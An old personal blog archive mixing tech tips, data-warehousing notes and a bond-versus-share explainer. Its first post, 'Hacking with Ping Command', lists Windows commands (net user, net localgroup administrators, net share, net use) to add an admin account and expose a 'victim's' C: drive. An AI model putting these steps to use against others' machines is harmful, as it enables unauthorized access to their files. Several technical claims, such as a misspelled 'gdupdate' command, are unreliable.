Saturday, December 6, 2008

Hacking with Ping Command

1) Ping command

a cool way to say hello to victim


ping [victims ip goes here]

if the result is request timed out then the user is ofline

if the result is reply from [ip] bytes=32 time<1ms TTL 64

the victim is online.

2)net user [anyname] /add

it adds a new net user put any name inplace of [anyname]

3)net localgroup administrators [anyname] /add

This is the command that make your user go to the administrators


Depending on the windows version the name will be different.

If you got an american version the name for the group is Administrators

and for the portuguese version is administradores so it's nice

yo know wich version of windows xp you are going to try share.

4)net share system=C:\ /unlimited

This commands share the C: drive with the name of system.

you can use any root dir. instead

5)net use \\victimip [nameofnetaccount]

This command will make a session between you and the victim

Of course where it says victimip you will insert the victim ip.

where nameofnetuser is the name via which victim logs on

6)explorer \\victimip\system

And this will open a explorer windows in the share system wich is

the C: drive with administrators access!

Monday, December 1, 2008



ERP is meant to store and facilitate movement of data seamlessly between various departments,
whereas BI is meant for effective and efficient retrieval or data for analytical purposes.

Examples of ERP software’s include SAP, Oracle 11i, JD Edwards, PeopleSoft .
Examples of BI software’s include Business Objects, Cognos, Hyperion, ProClarity,
Microsoft SSAS & SSRS and SAP BIW.

Dimensional Modeling

The traditional data model called ER model is how most data is stored in RDBMS or typical databases;
however this model does not support fast retrieval of information. ER model, i.e. Entity Relationship
model is not optimized for query purposes. It is meant to store the data. Hence it is converted into
Dimensional model which is optimized for query.

A Dimensional model essentially comprises of schemas. Schemas are the representation of objects and data.
There are various kinds of schemas in Dimensional model, e.g. Star schema, Snowflake schema, Galaxy schema,
Hybrid schema and others. Star and snowflake are the two types which are broadly used.

Star Schema –
Any source system is highly normalized. We de-normalize source database with the help of star schema.
Star schema is the de-normalized version which is presented in the form of a star. The centre of the
star schema is the fact table which comprises the measures of the business. The fact table is connected to
various dimensions, thus giving it the shape of a star.

Snowflake schema -
Snowflake schema can be called as an extension of the Star schema. It is in normalized form. For example,
if we have a dimension called Product Dimension associated with fact table, this Product Dimension will be
further sub-divided into multiple tables to form a Snowflake schema.

The difference between Star and Snowflake schema is that, in Star schema, dimensions are less and hence
complexity of business also reduces. It does not involve granular level analysis. On the other hand, there
is large number of sub dimensions with millions of records in these tables in snowflake schema. Dimensions
change rapidly in this type of schema and it requires granular level analysis. Since dimensions are split
into sub tables, it subsequently leads to increase in the number of joins in Snowflake schema. The
processing time or query time also reduces as the consequence of having a lot of joins.

The core advantage of Snowflake schema is that, we can choose the sub dimension which is required for
analysis, without taking the entire parent dimensions at one shot. This makes the whole process simpler
and easier for the business users.
In star schema, we do not enjoy the same privilege.

In most cases, the combination of these two schema's is prevalent in the
implementation of data warehouses. We can come to the conclusion that, the purpose of creating Dimensional
models is to convert data into a query friendly environment where retrieval is much faster as compared to that in a conventional ER model.

Data Warehousing are of two types one is OLTP (Online Transaction Processing) and OLAP (Online Analytic Processing) .

OLTP is used mainly in Banking Doamin and Share Trading domain .
OLAP is used to getting Reports for example Sales Report of a particular month

Thursday, October 30, 2008

Bond vs Share


The primary advantage of being a creditor is that you have a higher claim on assets than shareholders do: that is, in the case of bankruptcy, a bondholder will get paid before a shareholder. However, the bondholder does not share in the profits if a company does well - he or she is entitled only to the principal plus interest.

Friday, September 26, 2008

Without restarting server

To get effect when a new user created ,without restarting server in Windows Server- 2003

gdupdate /force


SC is a command line program used for communicating with the
NT Service Controller and services.

Tuesday, September 23, 2008

Sound Problem,Disk Drive,Folders

While you are opening any file/folder during playing of CD/DVD u r feeling turbulence of sound.To avoid follow d given steps

Open Device Manager
-IDE ATA/ATAPI controllers
-Primary IDE channel
-Advanced Settings
-Transfer Mode(Both)
-select DMA if available

Do d Same in secondary IDE channel

To Change Drive Letter:

Go to

Control panel>admin tool>computer management>disk managmnt>right click d partition whose name u want 2 change


Device names such as COM1, CON or LPT1 are reserved words, and they can't be used as folder or file names.